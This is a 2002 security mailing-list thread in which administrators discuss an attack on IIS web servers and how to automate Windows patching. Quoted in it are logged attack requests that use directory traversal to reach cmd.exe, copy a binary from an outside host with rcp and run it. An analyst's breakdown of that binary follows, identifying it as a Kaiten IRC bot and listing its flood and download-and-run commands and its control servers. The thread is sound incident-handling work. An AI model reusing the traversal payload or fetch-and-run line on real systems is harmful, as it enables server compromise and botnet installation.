RE: new IIS worm? (rcp lsass.exe)

["David LeBlanc" <dleblanc () microsoft com>]

If you want something that automatically installs only patches you
approve, take a look at
http://www.microsoft.com/windows2000/windowsupdate/sus/default.asp

It might help you in your environment.

> -----Original Message-----
> From: zeno [mailto:bugtraq () cgisecurity net] 
> Sent: Tuesday, September 24, 2002 2:08 PM
> To: John Campbell
> Cc: incidents () securityfocus com
> Subject: Re: new IIS worm? (rcp lsass.exe)
>
>
> > Windows Update from you-know-who actually does what you 
> describe.  I'd 
> > always been leery of it, but tried it out recently when 
> setting up a 
> > W2K test server, and it performed as advertised.  It did 
> take several 
> > iterations to get everything updated, owing to various dependencies.
>
> When I used windows update it downloaded the patches but 
> didn't install them. I had to manually go through each one. 
> While this isn't a big deal I am looking for something 100 
> percent automated with install of the patches. Perhaps I'm 
> missing something I deal mostly with unix.
>
> - zeno
>
>
> > Regards,
> >
> > John Campbell, CISSP, GCWN
> > Information Security Engineer
> > Washington School Information Processing Cooperative
> > (WSIPC)
> > Everett, Washington, USA
> >
> > -----Original Message-----
> > From: zeno [mailto:bugtraq () cgisecurity net]
> > Sent: Tuesday, September 24, 2002 11:29 AM
> > To: Mark Challender
> > Cc: 'pj () esec dk'; incidents () securityfocus com
> > Subject: Re: new IIS worm? (rcp lsass.exe)
> >
> >
> > > Hardening of IIS with the tools available at Microsoft and using
> > > URLSCAN with the EXE blocking on will stop these attacks.
> > >
> > > Patch, patch, patch, recheck the patches and use URLSCAN!
> >
> > Does anyone know of a gui windows tool that scans your system and 
> > provides you with a list of needed patches, and then allows you to 
> > select, and have it autodownload and install them? I can't seem to 
> > find one (needed mostly for iis).
> >
> > - zeno () cgisecurity com
> >  
> >
> >
> > > Mark Challender
> > > Network Administrator
> > >
> > > ==================
> > > Veni, Vidi, Geeki
> > > ==================
> > >
> > >
> > > -----Original Message-----
> > > From: pj () esec dk [mailto:pj () esec dk]
> > > Sent: Monday, September 23, 2002 3:27 AM
> > > To: incidents () securityfocus com
> > > Subject: Re: new IIS worm? (rcp lsass.exe)
> > >
> > >
> > >
> > > Christian Mock:
> > >
> > > > Then it seems to go after the web servers, sending the following:
> > >
> > > > GET
> /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+rcp+-b+64.21.95.7.lp:ls
> > > as
> > > s.exe+
> > > .
> > >  HTTP/1.0..
> > >
> > > > and
> > >
> > > > GET 
> /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+lsass.exe HTTP/1.0
> > > > I've been able to get hold of that lsass.exe binary 
> (9728 bytes), 
> > > > but
> >
> > > > I lack the skills to analyze it; I'll happily mail it to anybody 
> > > > who
> > > > asks.
> > >
> > >
> > > We have seen this attack from 4 different sources since Sept. 16, 
> > > and
> > > have informed the owner of 64.21.95.7 and downloaded the 
> lsass.exe for
> > > investigation.
> > >
> > > Based on the attack rate this is most likely a scripted or manual
> > > attack, not a worm.
> > >
> > > Judging from  the embedded string in this compressed binary  it
> > > appears to be an IRC bot  based on the kaiten.c code written by 
> > > contem@efnet, the author of the Slapper worm :
> > >
> > > Kaiten Win32 API version 2002 by contem@efnet
> > >
> > > The binary  contains these domainnames, most likeky IRC 
> servers used
> > > for controlling the bot:
> > >
> > > telsa5.mine.nu (Korea)
> > > irc.logicfive.net (Taiwan)
> > > moncredo.shacknet.nu (USA)
> > > telsacredo.shacknet.nu (USA)
> > > lar.ath.cx (Taiwan)
> > >
> > > The program accepts commands to make various DOS attacks 
> or download
> > > new version or executables with http:
> > >
> > > NOTICE %s :PUSH <target> <port> <secs>   = A push flooder
> > > NOTICE %s :TCP <target> <port> <secs>    = A syn flooder
> > > NOTICE %s :UDP <target> <port> <secs>    = A udp flooder
> > > NOTICE %s :MCON <target> <port> <times>  = A connectbomb flooder
> > > NOTICE %s :NICK <nick>                   = Changes the nick of the
> > client
> > > NOTICE %s :DISABLE <pass>                = Disables all 
> packeting from
> > this
> > > client
> > > NOTICE %s :ENABLE <pass>                 = Enables all 
> packeting from
> > this
> > > client
> > > NOTICE %s :UPDATE <http address>         = Downloads a 
> file off the
> > web and
> > > updates the client
> > > NOTICE %s :RUN <http address>            = Downloads a 
> file off the
> > web and
> > > runs it
> > > NOTICE %s :GET <http address>            = Downloads a 
> file off the
> > web
> > > NOTICE %s :ADDSERVER <server>            = Adds a server 
> to the list
> > > NOTICE %s :DELSERVER <server>            = Deletes a 
> server from the
> > list
> > > NOTICE %s :LISTSERVERS                   = Lists server 
> on the list
> > > NOTICE %s :KILL                          = Kills the client
> > > NOTICE %s :VERSION                       = Requests 
> version of client
> > > NOTICE %s :HELP                          = Displays this
> > >
> > >
> > > There seems also to be a default account and password in 
> the german
> > > language included in this specific version of Kaiten.
> > >
> > > The IIS attack that tries to inject this Trojan usually 
> has another
> > > URL with "CONNECT chat.vtm.be:6667".  This is an attempt 
> to proxy an 
> > > connection to port 6667(IRC) on chat.vtm.be.
> > >
> > >
> > >
> > > Peter Jelver
> > > ...
> > >
> > > eSec A/S
> > >
> > > http://www.esec.dk
> ......................................................................
> > > ......
> > > .
> > >
> > > PGP Fingerprint : 47AF FFEC D48F 9C13 0C4F  E687 BB8A 
> 128F D85C A7D7
> > >
> --------------------------------------------------------------------
> > > --
> > > ------
> > > This list is provided by the SecurityFocus ARIS analyzer service.
> > > For more information on this free incident handling, management 
> > > and tracking system please see: http://aris.securityfocus.com
> --------------------------------------------------------------------
> > > --
> > > ------
> > > This list is provided by the SecurityFocus ARIS analyzer service.
> > > For more information on this free incident handling, management 
> > > and tracking system please see: http://aris.securityfocus.com
> ----------------------------------------------------------------------
> > --
> > ----
> > This list is provided by the SecurityFocus ARIS analyzer 
> service. For
> > more information on this free incident handling, management 
> > and tracking system please see: http://aris.securityfocus.com
>
>
> --------------------------------------------------------------
> --------------
> This list is provided by the SecurityFocus ARIS analyzer 
> service. For more information on this free incident handling, 
> management 
> and tracking system please see: http://aris.securityfocus.com

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com